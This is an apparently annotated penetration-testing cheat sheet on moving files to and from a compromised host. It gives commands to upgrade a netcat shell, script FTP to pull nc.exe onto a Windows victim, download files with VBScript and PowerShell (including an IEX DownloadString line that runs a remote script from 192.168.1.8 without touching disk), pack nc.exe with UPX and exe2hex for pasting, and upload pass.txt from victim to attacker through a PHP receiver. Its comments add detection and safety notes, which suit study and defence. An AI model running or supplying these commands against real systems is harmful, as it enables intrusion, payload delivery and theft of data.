File Transfer

Linux File Transfer

Netcat - From Non-Interactive to Interactive Shell

# Run the following command after getting a non-interactive shell.
# It starts /bin/bash under a pseudo-terminal allocated by Python's pty module,
# so programs that insist on a TTY (for example password prompts) work.
# Detection: this command line appears verbatim in process-creation / auditd
# execve records on hosts where those are collected.
python -c 'import pty; pty.spawn("/bin/bash")'

# Fix Arrows Issue
# Step 1 (keystroke, not a command): suspend the session and return to the
# local shell.
CTRL + Z
# Step 2: put the LOCAL terminal into raw mode with echo off, so keystrokes are
# passed through unprocessed instead of being interpreted locally.
stty raw -echo 
# Step 3: bring the suspended session back to the foreground.
fg
# The local terminal stays in raw/no-echo mode once the session ends; `reset`
# or `stty sane` restores it.

Windows File Transfer

FTP

# Install the pure-ftpd FTP server (Debian/Ubuntu package manager)
sudo apt update && sudo apt install pure-ftpd
# Then apply the FTP configuration script this guide refers to (not shown on this page).
# FTP carries credentials and file contents in cleartext; stop the service
# once the transfer is finished.

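# Create ftp.txt holding the FTP commands, one per line.
# The first echo uses > to create (or truncate) the file; every later echo
# uses >> to append. Writing each line with > would leave only the last
# line ("bye") in the file.
# There is no space before the redirect so that Windows cmd does not write a
# trailing space onto each line.
# The line after USER is sent as the password, so ftp.txt holds a cleartext
# credential; delete the file after the transfer.
echo open 192.168.1.8> ftp.txt
echo USER limbo>> ftp.txt
echo limbo>> ftp.txt
echo bin>> ftp.txt
echo GET nc.exe>> ftp.txt
echo bye>> ftp.txt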

# Transfer file using FTP (Windows ftp.exe)
#   -v          suppress display of remote server responses
#   -n          suppress auto-login on connect (the script sends USER itself)
#   -s:ftp.txt  read the FTP commands from ftp.txt
# Detection: ftp.exe started with -s:<file> is recorded in process-creation
# logs where command-line auditing is enabled.
ftp -v -n -s:ftp.txt

# Fixing timeout problem
# Writes "40110 40210" to pure-ftpd's PassivePortRange setting, limiting
# passive-mode data connections to that port range.
# NOTE(review): presumably the timeout comes from passive data ports being
# blocked by a firewall; confirm, and allow only this range.
echo "40110 40210" | sudo tee /etc/pure-ftpd/conf/PassivePortRange
# Restart the service so the new setting is read
sudo service pure-ftpd restart

VBScript to Download Files

# Save the following content into wget.vbs
# Run using: cscript wget.vbs http://192.168.1.8/evil.txt evil.txt
' wget.vbs - fetch a URL with an HTTP GET and write the response body to a file.
' Arguments: (0) URL to fetch, (1) path of the output file.
' The body is written as received: the script does not look at the HTTP status
' and performs no integrity check, so verify the result (for example by
' comparing a hash) before using it.
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
' Proxy-setting constants; none of them is referenced below.
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts
Err.Clear
Set http = Nothing
' Try several HTTP client COM objects in order.
' NOTE(review): there is no "On Error Resume Next", so a failing CreateObject
' raises a run-time error and stops the script; the fallbacks after the first
' call are then never reached.
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
' Synchronous GET (third argument False = not asynchronous).
' VBScript identifiers are case-insensitive, so strURL is the strUrl set above.
http.Open "GET",strURL,False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
' Create the output file; the second argument True overwrites an existing file.
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile,True)
' strData and strBuffer are initialised but not used afterwards.
strData = ""
strBuffer = ""
' Write the body one byte at a time: Midb picks byte lngCounter + 1, Ascb
' returns its value, and Chr turns it into a character for the text stream.
' NOTE(review): the file is opened as a text stream; confirm that byte values
' 128-255 round-trip unchanged on the system code page for binary downloads.
For lngCounter = 0 to UBound(varByteArray)
    ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1)))
Next
ts.Close

PowerShell Commands to Download Files

# Save the following content into wget.ps1
# Run using: powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
# Fetch one file over HTTP with System.Net.WebClient and write it to disk.
# The URL is plain http://, so the transfer has neither confidentiality nor
# integrity protection; compare a hash of the result against a known value.
$source      = "http://192.168.1.8/evil2.txt"
$destination = "evil2.txt"
$client      = New-Object System.Net.WebClient
$client.DownloadFile($source, $destination)
# PowerShell in one line (same WebClient download, saved as evil2-2.txt)
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.8/evil2.txt', 'evil2-2.txt')
# On-the-fly command (Run PowerShell script without downloading it on the hard disk)
# DownloadString returns the script text and IEX (Invoke-Expression) executes
# it in the current session, so whatever the server returns at that moment is
# run; over plain HTTP the content can be altered in transit.
# Detection: PowerShell Script Block Logging (event ID 4104) records the
# script text as it is executed, and AMSI exposes it to the installed
# antimalware product, even though nothing is written to disk.
powershell IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.8/hello.ps1')

Compressing and Encoding Executable

# Compress nc.exe in place with UPX (-9 selects a higher compression level).
# This step only packs the file; the encoding is done by exe2hex below.
upx -9 nc.exe

# Convert the executable to a text script containing its bytes as hexadecimal;
# -p names the output file, here nc.cmd.
exe2hex nc.exe -p nc.cmd

# Copy and paste the content of nc.cmd into the shell

File Upload from Victim to Attacker

# Save the following PHP code into /var/www/html/upload.php
# Use the code to upload a file (e.g., pass.txt) from the victim to the attacker
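<?php
// Receiver for a single HTTP file upload sent in the form field "file".
// The file is stored in $uploaddir under the name supplied by the client.
//
// The client controls that name, so it is reduced to its final path component
// before being joined to the directory; otherwise a name containing "../"
// could place the file outside $uploaddir.
//
// NOTE(review): the endpoint is unauthenticated and accepts uploads from any
// client that can reach it; restrict it by source address and remove it once
// the transfer is finished.
$uploaddir = '/var/www/uploads/';

// Reject requests that carry no upload or for which PHP reported an error
// (this also rejects the array form produced by multi-file fields).
if (!isset($_FILES['file']) || $_FILES['file']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit;
}

// Keep only the file-name part of the client-supplied name.
$name = basename($_FILES['file']['name']);
if ($name === '' || $name === '.' || $name === '..') {
    http_response_code(400);
    exit;
}
$uploadfile = $uploaddir . $name;

// move_uploaded_file() only moves files that arrived through an HTTP POST
// upload and returns false on failure; report that instead of ignoring it.
if (!move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
    http_response_code(500);
    exit;
}
?>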
# Upload a file (e.g., pass.txt) using PowerShell
# WebClient.UploadFile sends the local file to the URL as an HTTP POST file
# upload in the form field "file", which upload.php reads from $_FILES['file'].
# The request goes over plain HTTP, so the file contents are readable on the
# network path between the two hosts.
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.8/upload.php', 'pass.txt')
